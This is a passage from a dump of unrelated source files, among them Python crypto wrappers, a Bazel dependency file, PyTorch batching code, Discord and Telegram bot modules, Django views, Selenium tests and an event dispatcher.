blob.\n\n Args:\n data: String containing the blob data.\n signing_key: The key to sign with.\n verify_key: Key to verify with. If None we assume the signing key also\n contains the public key.\n\n Returns:\n self for call chaining.\n \"\"\"\n\n if signing_key.KeyLen() < 2048:\n logging.warning(\"signing key is too short.\")\n\n self.signature = signing_key.Sign(data)\n self.signature_type = self.SignatureType.RSA_PKCS1v15\n\n self.digest = hashlib.sha256(data).digest()\n self.digest_type = self.HashType.SHA256\n self.data = data\n\n # Test we can verify before we send it off.\n if verify_key is None:\n verify_key = signing_key.GetPublicKey()\n\n # Verify our own data.\n self.Verify(verify_key)\n\n return self\n\n\nclass EncryptionKey(rdfvalue.RDFBytes):\n \"\"\"Base class for encryption keys.\"\"\"\n\n # Size of the key in bits.\n length = 0\n\n def ParseFromString(self, string):\n\n if len(string) % 8:\n raise CipherError(\n \"Invalid key length %d (%s).\" % (len(string) * 8, string))\n\n self._value = string\n self.length = 8 * len(self._value)\n\n if self.length < 128:\n raise CipherError(\"Key too short (%d): %s\" % (self.length, string))\n\n def __str__(self):\n digest = hashlib.sha256(self.AsHexDigest()).hexdigest()\n return \"%s (%s)\" % (self.__class__.__name__, digest)\n\n def AsHexDigest(self):\n return binascii.hexlify(self._value)\n\n @classmethod\n def FromHex(cls, hex_string):\n precondition.AssertType(hex_string, Text)\n return cls(binascii.unhexlify(hex_string))\n\n def SerializeToString(self):\n return self._value\n\n @classmethod\n def GenerateKey(cls, length=128):\n return cls(os.urandom(length // 8))\n\n @classmethod\n def GenerateRandomIV(cls, length=128):\n return cls.GenerateKey(length=length)\n\n def RawBytes(self):\n return self._value\n\n\n# TODO(amoser): Size is now flexible, this class makes no sense anymore.\nclass AES128Key(EncryptionKey):\n length = 128\n\n\nclass AutoGeneratedAES128Key(AES128Key):\n \"\"\"Like AES128Key, but its UI edit box is prefilled with generated key.\"\"\"\n\n def __init__(self, initializer=None, **kwargs):\n if isinstance(initializer, AES128Key):\n super(AutoGeneratedAES128Key, self).__init__(\n initializer=initializer.RawBytes(), **kwargs)\n else:\n super(AutoGeneratedAES128Key, self).__init__(\n initializer=initializer, **kwargs)\n\n\nclass StreamingCBCEncryptor(object):\n \"\"\"A class to stream data to a CBCCipher object.\"\"\"\n\n def __init__(self, cipher):\n self._cipher = cipher\n self._encryptor = cipher.GetEncryptor()\n self._overflow_buffer = b\"\"\n self._block_size = len(cipher.key)\n\n def Update(self, data):\n data = self._overflow_buffer + data\n overflow_count = len(data) % self._block_size\n length_to_encrypt = len(data) - overflow_count\n to_encrypt = data[:length_to_encrypt]\n self._overflow_buffer = data[length_to_encrypt:]\n return self._encryptor.update(to_encrypt)\n\n def Finalize(self):\n res = self._encryptor.update(self._cipher.Pad(self._overflow_buffer))\n res += self._encryptor.finalize()\n return res\n\n\nclass AES128CBCCipher(object):\n \"\"\"A Cipher using AES128 in CBC mode and PKCS7 for padding.\"\"\"\n\n algorithm = None\n\n def __init__(self, key, iv):\n \"\"\"Init.\n\n Args:\n key: The key, a rdf_crypto.EncryptionKey instance.\n iv: The iv, a rdf_crypto.EncryptionKey instance.\n \"\"\"\n self.key = key.RawBytes()\n self.iv = iv.RawBytes()\n\n def Pad(self, data):\n padder = sym_padding.PKCS7(128).padder()\n return padder.update(data) + padder.finalize()\n\n def UnPad(self, padded_data):\n unpadder = sym_padding.PKCS7(128).unpadder()\n return unpadder.update(padded_data) + unpadder.finalize()\n\n def GetEncryptor(self):\n return ciphers.Cipher(\n algorithms.AES(self.key), modes.CBC(self.iv),\n backend=openssl.backend).encryptor()\n\n def Encrypt(self, data):\n \"\"\"A convenience method which pads and encrypts at once.\"\"\"\n encryptor = self.GetEncryptor()\n padded_data = self.Pad(data)\n\n try:\n return encryptor.update(padded_data) + encryptor.finalize()\n except ValueError as e:\n raise CipherError(e)\n\n def GetDecryptor(self):\n return ciphers.Cipher(\n algorithms.AES(self.key), modes.CBC(self.iv),\n backend=openssl.backend).decryptor()\n\n def Decrypt(self, data):\n \"\"\"A convenience method which pads and decrypts at once.\"\"\"\n decryptor = self.GetDecryptor()\n\n try:\n padded_data = decryptor.update(data) + decryptor.finalize()\n return self.UnPad(padded_data)\n except ValueError as e:\n raise CipherError(e)\n\n\nclass SymmetricCipher(rdf_structs.RDFProtoStruct):\n \"\"\"Abstract symmetric cipher operations.\"\"\"\n protobuf = jobs_pb2.SymmetricCipher\n rdf_deps = [\n EncryptionKey,\n ]\n\n @classmethod\n def Generate(cls, algorithm):\n if algorithm != cls.Algorithm.AES128CBC:\n raise RuntimeError(\"Algorithm not supported.\")\n\n return cls(\n _algorithm=algorithm,\n _key=EncryptionKey.GenerateKey(length=128),\n _iv=EncryptionKey.GenerateKey(length=128))\n\n def _get_cipher(self):\n if self._algorithm != self.Algorithm.AES128CBC:\n raise CipherError(\"Unknown cipher type %s\" % self._algorithm)\n\n return AES128CBCCipher(self._key, self._iv)\n\n def Encrypt(self, data):\n if self._algorithm == self.Algorithm.NONE:\n raise TypeError(\"Empty encryption is not allowed.\")\n\n return self._get_cipher().Encrypt(data)\n\n def Decrypt(self, data):\n if self._algorithm == self.Algorithm.NONE:\n raise TypeError(\"Empty encryption is not allowed.\")\n\n return self._get_cipher().Decrypt(data)\n\n\nclass HMAC(object):\n \"\"\"A wrapper for the cryptography HMAC object.\"\"\"\n\n def __init__(self, key, use_sha256=False):\n # We store the raw key from cryptography.io.\n if isinstance(key, EncryptionKey):\n key = key.RawBytes()\n\n self.key = key\n self._hmac = self._NewHMAC(use_sha256=use_sha256)\n\n def _NewHMAC(self, use_sha256=False):\n if use_sha256:\n hash_algorithm = hashes.SHA256()\n else:\n hash_algorithm = hashes.SHA1()\n return hmac.HMAC(self.key, hash_algorithm, backend=openssl.backend)\n\n def Update(self, data):\n self._hmac.update(data)\n\n def Finalize(self):\n return self._hmac.finalize()\n\n def HMAC(self, message, use_sha256=False):\n \"\"\"Calculates the HMAC for a given message.\"\"\"\n h = self._NewHMAC(use_sha256=use_sha256)\n h.update(message)\n return h.finalize()\n\n def Verify(self, message, signature):\n \"\"\"Verifies the signature for a given message.\"\"\"\n siglen = len(signature)\n if siglen == 20:\n hash_algorithm = hashes.SHA1()\n elif siglen == 32:\n hash_algorithm = hashes.SHA256()\n else:\n raise VerificationError(\"Invalid signature length %d.\" % siglen)\n\n h = hmac.HMAC(self.key, hash_algorithm, backend=openssl.backend)\n h.update(message)\n try:\n h.verify(signature)\n return True\n except exceptions.InvalidSignature as e:\n raise VerificationError(e)\n\n\nclass Password(rdf_structs.RDFProtoStruct):\n \"\"\"A password stored in the database.\"\"\"\n protobuf = jobs_pb2.Password\n\n def _CalculateHash(self, password, salt, iteration_count):\n kdf = pbkdf2.PBKDF2HMAC(\n algorithm=hashes.SHA256(),\n length=32,\n salt=salt,\n iterations=iteration_count,\n backend=openssl.backend)\n return kdf.derive(password)\n\n def SetPassword(self, password):\n self.salt = b\"%016x\" % random.UInt64()\n self.iteration_count = 100000\n\n # prevent non-descriptive 'key_material must be bytes' error later\n if isinstance(password, string_types):\n password = password.encode(\"utf-8\")\n\n self.hashed_pwd = self._CalculateHash(password, self.salt,\n self.iteration_count)\n\n def CheckPassword(self, password):\n # prevent non-descriptive 'key_material must be bytes' error later\n if isinstance(password, string_types):\n password = password.encode(\"utf-8\")\n\n h = self._CalculateHash(password, self.salt, self.iteration_count)\n return constant_time.bytes_eq(h, self.hashed_pwd)\n"} {"ext": "bzl", "sha": "1a2fd22700cafa76f737a3dd29aba393dd1c839e", "content": "# Copyright 2019 Google LLC\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are\n# met:\n#\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# * Neither the name of Google LLC nor the names of its\n# contributors may be used to endorse or promote products derived from\n# this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nload(\"@bazel_tools//tools/build_defs/repo:git.bzl\", \"git_repository\")\nload(\"@bazel_tools//tools/build_defs/repo:http.bzl\", \"http_archive\")\nload(\"@com_google_api_gax_java_properties//:dependencies.properties.bzl\", \"PROPERTIES\")\n\ndef com_google_api_gax_java_repositories():\n # Import dependencies shared between Gradle and Bazel (i.e. maven dependencies)\n for name, artifact in PROPERTIES.items():\n _maybe(\n native.maven_jar,\n name = name,\n strip_repo_prefix = \"maven.\",\n artifact = _fix_bazel_artifact_format(artifact),\n )\n\n # Import Bazel-only dependencies (Gradle version will import maven artifacts of same\n # version, while Bazel will depend on Bazel workspaces). The versions are shared in the\n # properties file.\n\n _protobuf_version = PROPERTIES[\"version.com_google_protobuf\"]\n _protobuf_version_in_link = \"v%s\" % _protobuf_version\n _maybe(\n http_archive,\n name = \"com_google_protobuf\",\n urls = [\"https://github.com/protocolbuffers/protobuf/archive/%s.zip\" % _protobuf_version_in_link],\n strip_prefix = \"protobuf-%s\" % _protobuf_version,\n )\n\n _grpc_version = PROPERTIES[\"version.io_grpc\"]\n _grpc_version_in_link = \"v%s\" % _grpc_version\n _maybe(\n http_archive,\n name = \"io_grpc_grpc_java\",\n urls = [\"https://github.com/grpc/grpc-java/archive/%s.zip\" % _grpc_version_in_link],\n strip_prefix = \"grpc-java-%s\" % _grpc_version,\n )\n\n _maybe(\n http_archive,\n name = \"bazel_skylib\",\n strip_prefix = \"bazel-skylib-0.7.0\",\n urls = [\"https://github.com/bazelbuild/bazel-skylib/archive/0.7.0.zip\"],\n )\n\n _maybe(\n native.maven_jar,\n name = \"io_grpc_grpc_netty_shaded\",\n artifact = \"io.grpc:grpc-netty-shaded:%s\" % PROPERTIES[\"version.io_grpc\"],\n )\n\n _maybe(\n native.maven_jar,\n name = \"google_java_format_all_deps\",\n artifact = \"com.google.googlejavaformat:google-java-format:jar:all-deps:%s\" % PROPERTIES[\"version.google_java_format\"],\n )\n\n _maybe(\n native.bind,\n name = \"guava\",\n actual = \"@com_google_guava_guava//jar\",\n )\n\n _maybe(\n native.bind,\n name = \"gson\",\n actual = \"@com_google_code_gson_gson//jar\",\n )\n\n _maybe(\n native.bind,\n name = \"error_prone_annotations\",\n actual = \"@com_google_errorprone_error_prone_annotations//jar\",\n )\n\ndef _maybe(repo_rule, name, strip_repo_prefix = \"\", **kwargs):\n if not name.startswith(strip_repo_prefix):\n return\n repo_name = name[len(strip_repo_prefix):]\n if repo_name in native.existing_rules():\n return\n repo_rule(name = repo_name, **kwargs)\n\ndef _fix_bazel_artifact_format(artifact_id):\n # Fix the artifact id format discrepancy between Bazel & Gradle.\n # This is relevant only when classifier is specified explicitly.\n # Bazel format: groupId:artifactId:jar:classifier:version\n # Gradle format: groupId:artifactId:version:classifier\n ids = artifact_id.split(\":\")\n if len(ids) != 4:\n return artifact_id\n return \"%s:%s:%s:%s:%s\" % (ids[0], ids[1], \"jar\", ids[3], ids[2])\n"} {"ext": "py", "sha": "1a2fd23a0e2f3b5198b6e8ac5f62026fc8f32429", "content": "from torch.autograd import Variable\nfrom Model import Decoder\nimport torchsnooper\n\n\n# Batches and Masking\nclass Batch:\n \"此对象用于在训练时进行已屏蔽的批数据处理\"\n\n def __init__(self, src, trg=None, pad=0):\n self.src = src\n self.src_mask = (src != pad).unsqueeze(-2)\n if trg is not None:\n self.trg = trg[:, :-1]\n self.trg_y = trg[:, 1:]\n self.trg_mask = \\\n self.make_std_mask(self.trg, pad)\n self.ntokens = (self.trg_y != pad).data.sum()\n\n @staticmethod\n def make_std_mask(tgt, pad):\n \"创建一个mask来隐藏填充和将来的单词\"\n tgt_mask = (tgt != pad).unsqueeze(-2)\n tgt_mask = tgt_mask & Variable(\n subsequent_mask(tgt.size(-1)).type_as(tgt_mask.data))\n return tgt_mask\n\n\n# 我们将使用torch 文本进行批处理。在TorchText函数中创建批次,确保填充最大批次大小不超过阈值(如果我们有8个GPU,则为25000)。\nglobal max_src_in_batch, max_tgt_in_batch\n\n\ndef batch_size_fn(new, count, sofar):\n \"持续扩大批处理并计算标识+填充的总数\"\n global max_src_in_batch, max_tgt_in_batch\n if count == 1:\n max_src_in_batch = 0\n max_tgt_in_batch = 0\n max_src_in_batch = max(max_src_in_batch, len(new.src))\n max_tgt_in_batch = max(max_tgt_in_batch, len(new.src) + 2)\n src_elements = count * max_src_in_batch\n tgt_elements = count * max_tgt_in_batch\n return max(src_elements, tgt_elements)\n\n\nclass Batch_kg:\n \"此对象用于在训练时进行已屏蔽的批数据处理\"\n\n def __init__(self, src, ent, trg=None, pad=0):\n self.src = src\n self.ent = ent\n self.trg = trg\n self.src_mask = (src != pad).unsqueeze(-2)\n self.ent_mask = None\n if self.trg is not None:\n self.trg = trg[:, :-1]\n self.trg_y = trg[:, 1:]\n self.trg_mask = \\\n self.make_std_mask(self.trg, pad)\n self.ntokens = (self.trg_y != pad).data.sum()\n\n @staticmethod\n def make_std_mask(tgt, pad):\n \"创建一个mask来隐藏填充和将来的单词\"\n tgt_mask = (tgt != pad).unsqueeze(-2)\n tgt_mask = tgt_mask & Variable(\n Decoder.subsequent_mask(tgt.size(-1)).type_as(tgt_mask.data))\n return tgt_mask\n\nclass Batch_ast:\n \"此对象用于在训练时进行已屏蔽的批数据处理\"\n\n def __init__(self, src, ent, ast, trg=None, pad=0):\n self.src = src\n self.ent = ent\n self.trg = trg\n self.ast = ast\n self.src_mask = (src != pad).unsqueeze(-2)\n self.ent_mask = None\n self.ast_mask = (src != pad).unsqueeze(-2)\n if self.trg is not None:\n self.trg = trg[:, :-1]\n self.trg_y = trg[:, 1:]\n self.trg_mask = \\\n self.make_std_mask(self.trg, pad)\n self.ntokens = (self.trg_y != pad).data.sum()\n\n @staticmethod\n def make_std_mask(tgt, pad):\n \"创建一个mask来隐藏填充和将来的单词\"\n tgt_mask = (tgt != pad).unsqueeze(-2)\n tgt_mask = tgt_mask & Variable(\n Decoder.subsequent_mask(tgt.size(-1)).type_as(tgt_mask.data))\n return tgt_mask"} {"ext": "py", "sha": "1a2fd2a6564dbb3f0de3e5aea345a7e5ec29fa0a", "content": "#coding=utf-8\n\nHOST = ''\nPORT = 50008\n\n# maximum sleep time while there is no connect for a smv process\nMAX_SLEEP_TIME = 5\n\n# time out in seconds\nTIME_OUT = 5\nMU_CHECK_TIMEOUT = 600\nMU_CHECK_MEMORY = 1024\n\n# path to NuSMV\nSMV_PATH = '/home/lyj238/Downloads/NuSMV/bin/NuSMV'\nMU_PATH = '/home/lyj238/Downloads/cmurphi5.4.9/src/mu'\nMU_INCLUDE = '/home/lyj238/Downloads/cmurphi5.4.9/include'\nGXX_PATH = '/usr/bin/g++'\n\n# path for storing smv files\nSMV_FILE_DIR = '/tmp/NuSMV/'\nMU_FILE_DIR = '/tmp/cmurphi/'\n\n\n\n\n\ndirs = [SMV_FILE_DIR, MU_FILE_DIR]\n\nimport os\n\nfor d in dirs:\n if not os.path.isdir(d):\n os.makedirs(d)\n"} {"ext": "py", "sha": "1a2fd3343a3364a08960b27e84d5f7c4cfcef834", "content": "# coding: utf-8\n\nimport re\nimport six\n\n\n\nfrom huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization\n\n\nclass ImportJobRequest:\n\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n\n sensitive_list = []\n\n openapi_types = {\n 'body': 'ImportFileReq'\n }\n\n attribute_map = {\n 'body': 'body'\n }\n\n def __init__(self, body=None):\n \"\"\"ImportJobRequest - a model defined in huaweicloud sdk\"\"\"\n \n \n\n self._body = None\n self.discriminator = None\n\n if body is not None:\n self.body = body\n\n @property\n def body(self):\n \"\"\"Gets the body of this ImportJobRequest.\n\n\n :return: The body of this ImportJobRequest.\n :rtype: ImportFileReq\n \"\"\"\n return self._body\n\n @body.setter\n def body(self, body):\n \"\"\"Sets the body of this ImportJobRequest.\n\n\n :param body: The body of this ImportJobRequest.\n :type: ImportFileReq\n \"\"\"\n self._body = body\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n if attr in self.sensitive_list:\n result[attr] = \"****\"\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n import simplejson as json\n if six.PY2:\n import sys\n reload(sys)\n sys.setdefaultencoding(\"utf-8\")\n return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)\n\n def __repr__(self):\n \"\"\"For `print`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, ImportJobRequest):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n"} {"ext": "py", "sha": "1a2fd3acdd0c8c8e703a6777cb4c6c209d8f9c7f", "content": "import cv2\r\nimport os\r\nimport numpy as np\r\nimport random\r\n\r\n# 例子为:在NEU-CLS数据集上操作的。\r\n# 在合成后数据集中随机选取若干张数据作为新的数据集。\r\n\r\nimage_dir = '/content/drive/MyDrive/colab/multiClass/NEU-CLS'\r\n\r\n# 打乱原始数据集顺序\r\nimg_path = []\r\nfor name in os.listdir(image_dir):\r\n img_path.append(os.path.join(image_dir, name))\r\n\r\nrandom.shuffle(img_path)\r\nnew_types = ['PS', 'RS', 'Cr', 'In', 'Pa', 'Sc']\r\n\r\n\r\n# 处理type\r\ndef str_to_defect_types(s):\r\n defect_types = []\r\n for t in new_types:\r\n defect_types.append(s.count(t))\r\n\r\n return defect_types\r\n\r\n\r\ns = []\r\ny = []\r\ndataset_list = img_path # 训练或测试需要修改 列表 训练:train_dataset; 测试:test_dataset\r\n# size_4_1 = int(len(dataset_list)/4) # 合成图像个数new_dataset_path\r\n# randvector = list(range(len(dataset_list)))\r\nrandvector = list(range(1000)) # 3400 2800 1440\r\n\r\nfor i in randvector:\r\n # img2 = dataset_list[i]\r\n img2 = random.choice(dataset_list) # 路径\r\n imgx = img2.split(\"/\")[-1].split(\"_\")[0] # 类别\r\n s.append(imgx)\r\n y.append(img2)\r\n\r\n\r\ndef to_matrix(x_y, n):\r\n ls_4 = []\r\n for i in range(0, len(x_y), n):\r\n ls_4.append(x_y[i: i + n])\r\n return ls_4\r\n\r\n\r\ns = to_matrix(s, 4)\r\ny = to_matrix(y, 4)\r\n\r\n# 合成图片 4 -> 1\r\nimg_data = []\r\nimg_type = []\r\nnum = 0\r\nfor i in range(250):\r\n x1 = cv2.imread(y[i][0]) # ,as_gray=True)\r\n x2 = cv2.imread(y[i][1]) # ,as_gray=True)\r\n x3 = cv2.imread(y[i][2]) # ,as_gray=True)\r\n x4 = cv2.imread(y[i][3]) # ,as_gray=True)\r\n im_h1 = cv2.hconcat([x1, x2]) # 合并函数\r\n im_h2 = cv2.hconcat([x3, x4])\r\n im_f = cv2.vconcat([im_h1, im_h2])\r\n img_data.append(np.array(im_f))\r\n img_type.append(str_to_defect_types(s[i])) # 处理type\r\n\r\nroot_path = '/content/drive/MyDrive/colab/multiClass/Defects' # 保存至此文件夹下\r\n# 类型转换\r\nimg_data_np = np.array(img_data)\r\nimg_type_np = np.array(img_type)\r\n\r\n# 合成保存文件绝对路径\r\nimg_data_file = os.path.join(root_path, 'data文件名.npy')\r\nimg_types = os.path.join(root_path, 'type文件名.npy')\r\n# 保存\r\nnp.save(img_data_file, img_data_np)\r\nnp.save(img_types, img_type_np)\r\n"} {"ext": "py", "sha": "1a2fd3c90aadf9f684f07ba1d0ba1cea7b840d49", "content": "import discord\nimport random\nimport asyncio\nimport discord\nfrom discord.ext import commands, tasks\n\nclass Prescence(commands.Cog):\n\n def __init__(self, bot):\n self.bot = bot\n self.prescence_default.start()\n self.ctfu_rgblighting.start()\n\n def cog_unload(self):\n self.prescence_default.cancel()\n\n @tasks.loop(seconds=60.0)\n async def prescence_default(self):\n \tawait self.bot.change_presence(activity=discord.Activity(type=discord.ActivityType.listening, name=f'{len(self.bot.users)} users.'))\n\n @tasks.loop(seconds=600.0)\n async def ctfu_rgblighting(self):\n \tctfuserver = self.bot.get_guild(694217343173394432)\n \trole = ctfuserver.get_role(701007133994647622)\n \tawait role.edit(colour=discord.Colour(random.randint(0, 0xFFFFFF)))\n\n @prescence_default.before_loop\n async def before_running(self):\n print('Bot setting up... Adding presence...')\n await self.bot.wait_until_ready()\n\n @ctfu_rgblighting.before_loop\n async def before_running(self):\n print('Bot setting up... Adding RGB Lighting for CTFU...')\n await self.bot.wait_until_ready()\n\ndef setup(bot):\n\tbot.add_cog(Prescence(bot))\n"} {"ext": "py", "sha": "1a2fd42c4c82234852097562aea1f7ebd15fb317", "content": "import random\nimport string\nfrom time import time\nfrom settings import URL, CHATS_COLLECTION_NAME\nfrom .base import CommandBase\n\n\nclass CommandStart(CommandBase):\n\n async def __call__(self, payload):\n\n self.set_bot(payload)\n\n registered_chat = self.sdk.db.find_one(CHATS_COLLECTION_NAME, {'chat': payload['chat'], 'bot': self.bot})\n\n if registered_chat:\n user_token = registered_chat['user']\n else:\n user_token = self.generate_user_token()\n new_chat = {\n 'chat': payload['chat'],\n 'user': user_token,\n 'dt_register': time(),\n 'bot': self.bot\n }\n self.sdk.db.insert(CHATS_COLLECTION_NAME, new_chat)\n self.sdk.log(\"New user registered with token {}\".format(user_token))\n\n message = \"Use this webhook for sending notifications to the chat:\\n\" \\\n \"\\n\" \\\n \"{}/u/{}\\n\" \\\n \"\\n\" \\\n \"Make a POST request with text in «message» param.\"\n\n await self.send(\n payload[\"chat\"],\n message.format(URL, user_token),\n \"HTML\"\n )\n\n @staticmethod\n def generate_user_token():\n return ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(8))\n"} {"ext": "py", "sha": "1a2fd4e0b8c7ae7228d7768503d24b8a68d0a440", "content": "import unittest\n\nfrom .framework import selenium_test, SeleniumTestCase\n\n\nclass ToolDescribingToursTestCase(SeleniumTestCase):\n\n def setUp(self):\n super().setUp()\n self.home()\n\n @selenium_test\n def test_generate_tour_no_data(self):\n \"\"\"Ensure a tour without data is generated and pops up.\"\"\"\n self._ensure_tdt_available()\n\n self.tool_open('environment_variables')\n\n self.tool_form_generate_tour()\n\n popover_component = self.components.tour.popover._\n popover_component.wait_for_visible()\n\n title = popover_component.title.wait_for_visible().text\n assert title == \"environment_variables Tour\", title\n\n # Run tool\n self.tool_form_execute()\n self.history_panel_wait_for_hid_ok(1)\n\n @selenium_test\n def test_generate_tour_with_data(self):\n \"\"\"Ensure a tour with data populates history.\"\"\"\n self._ensure_tdt_available()\n\n self.tool_open('md5sum')\n\n self.tool_form_generate_tour()\n\n self.history_panel_wait_for_hid_ok(1)\n\n popover_component = self.components.tour.popover._\n popover_component.wait_for_visible()\n\n title = popover_component.title.wait_for_visible().text\n assert title == \"md5sum Tour\", title\n self.screenshot(\"tool_describing_tour_0_start\")\n\n popover_component.next.wait_for_and_click()\n\n self.sleep_for(self.wait_types.UX_RENDER)\n\n text = popover_component.content.wait_for_visible().text\n assert \"Select dataset\" in text, text\n self.screenshot(\"tool_describing_tour_1_select\")\n\n popover_component.next.wait_for_and_click()\n\n self.sleep_for(self.wait_types.UX_RENDER)\n\n title = popover_component.title.wait_for_visible().text\n assert title == \"Execute tool\"\n self.screenshot(\"tool_describing_tour_2_execute\")\n\n popover_component.end.wait_for_and_click()\n popover_component.wait_for_absent_or_hidden()\n\n # Run tool\n self.tool_form_execute()\n self.history_panel_wait_for_hid_ok(2)\n self.screenshot(\"tool_describing_tour_3_after_execute\")\n\n def _ensure_tdt_available(self):\n \"\"\" Skip a test if the webhook TDT doesn't appear. \"\"\"\n response = self.api_get('webhooks', raw=True)\n self.assertEqual(response.status_code, 200)\n data = response.json()\n webhooks = [x['id'] for x in data]\n if 'tour_generator' not in webhooks:\n raise unittest.SkipTest('Skipping test, webhook \"Tool-Describing-Tours\" doesn\\'t appear to be configured.')\n"} {"ext": "py", "sha": "1a2fd5114444d7e16b700dc1146c193c859ccf76", "content": "#!/usr/bin/env python\nimport fileinput\n\njumps = [int(jump) for jump in fileinput.input()]\n\nclock, pc, max_pc = 0, 0, 0\nwhile pc < len(jumps):\n jump = jumps[pc]\n jumps[pc] += 1\n pc += jump\n clock += 1\n if pc > max_pc:\n max_pc = pc\n print(\"%09d: %04d\" % (clock, pc))\n\nprint(clock)\n"} {"ext": "py", "sha": "1a2fd5154fb5ea99a0ee7df2a192dfa2d82c21de", "content": "from django.contrib import messages\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.urls import reverse_lazy\nfrom django.shortcuts import redirect\nfrom django.views.generic import CreateView, FormView\n\nfrom ..forms import CreateBoaLeagueForm, JoinBoaLeagueForm\nfrom ..models import League, Manager\n\n\nclass JoinLeague(LoginRequiredMixin, CreateView):\n model = Manager\n form_class = JoinBoaLeagueForm\n http_method_names = [u'get', u'post']\n template_name = 'boa/join_league.html'\n object = None\n\n def get(self, request, *args, **kwargs):\n context = {}\n my_league_id = kwargs['pk']\n league = League.objects.get(id=my_league_id)\n\n if league.password:\n form = JoinBoaLeagueForm(pw=True)\n else:\n form = JoinBoaLeagueForm(pw=False)\n\n context.update({\n 'league': league,\n 'form': form,\n })\n return self.render_to_response(context)\n\n def get_success_url(self):\n return self.object.league.get_absolute_url()\n\n def post(self, request, *args, **kwargs):\n print(request.POST)\n\n my_league_id = kwargs['pk']\n league = League.objects.get(id=my_league_id)\n\n has_password = bool(league.password)\n form = JoinBoaLeagueForm(request.POST, pw=has_password)\n\n if form.is_valid():\n\n manager = form.save(commit=False)\n manager.league = league\n manager.user = self.request.user\n\n # check password\n if league.password and not('password' in form.cleaned_data\n and form.cleaned_data['password'] == league.password):\n form.add_error(\n None,\n f'Invalid password.'\n )\n return self.form_invalid(form)\n\n #check team count\n if Manager.objects.filter(league=league).count() >= league.max_teams_per_league:\n form.add_error(\n None,\n f'This league is full.'\n )\n return self.form_invalid(form)\n\n #check if already in league and team name\n for other_manager in Manager.objects.filter(league=league):\n if manager.user == other_manager.user:\n form.add_error(\n None,\n f'You already manage a team in this league'\n )\n return self.form_invalid(form)\n\n if manager.name == other_manager.name:\n form.add_error(\n None,\n f'There is already a team named {manager.name} in this league'\n )\n return self.form_invalid(form)\n\n manager.save()\n\n messages.success(\n request,\n f'Successfully joined league {league}'\n )\n return self.form_valid(form)\n else:\n return self.form_invalid(form)\n"} {"ext": "py", "sha": "1a2fd57ef5f3ecb75738f551fdb7c30b59a4b6ff", "content": "# vim:ts=4:sts=4:sw=4:expandtab\n\"\"\"Matching Clients with event queues.\n\"\"\"\n\n\nimport collections\n\nfrom satori.objects import Object\nfrom satori.events.misc import Namespace\n\n\nclass Dispatcher(Object):\n \"\"\"Abstract. Dispatches Events to Clients.\n \"\"\"\n\n def __init__(self):\n self.queues = dict()\n self.clients = dict()\n\n def _qdata(self, queue_id):\n if queue_id not in self.queues:\n qdata = Namespace()\n qdata.references = 0\n qdata.events = collections.deque()\n qdata.clients = collections.deque()\n self.queues[queue_id] = qdata\n return self.queues[queue_id]\n\n def _cdata(self, client):\n if client not in self.clients:\n cdata = Namespace()\n cdata.queue_ids = set()\n cdata.active = False\n self.clients[client] = cdata\n return self.clients[client]\n\n def attach(self, client, queue_id):\n \"\"\"Declare Client's interest in events from a given queue.\n \"\"\"\n qdata = self._qdata(queue_id)\n cdata = self._cdata(client)\n if queue_id not in cdata.queue_ids:\n cdata.queue_ids.add(queue_id)\n qdata.references += 1\n\n def detach(self, client, queue_id):\n \"\"\"Revoke Client's interest in events from a given queue.\n \"\"\"\n qdata = self._qdata(queue_id)\n cdata = self._cdata(client)\n if queue_id in cdata.queues:\n cdata.queue_ids.remove(queue_id)\n qdata.references -= 1\n if qdata.references == 0:\n yield queue_id\n del self.queues[queue_id]\n\n def activate(self, client):\n \"\"\"Mark a Client as ready to receive a (single) event.\n \"\"\"\n cdata = self._cdata(client)\n best = None\n for queue_id in cdata.queue_ids:\n qdata = self._qdata(queue_id)\n if len(qdata.events) > 0:\n event = qdata.events[0]\n if best is None or best[1] > event.serial:\n best = (queue_id, event.serial)\n if best is not None:\n qdata = self._qdata(best[0])\n client.sendResponse((best[0], 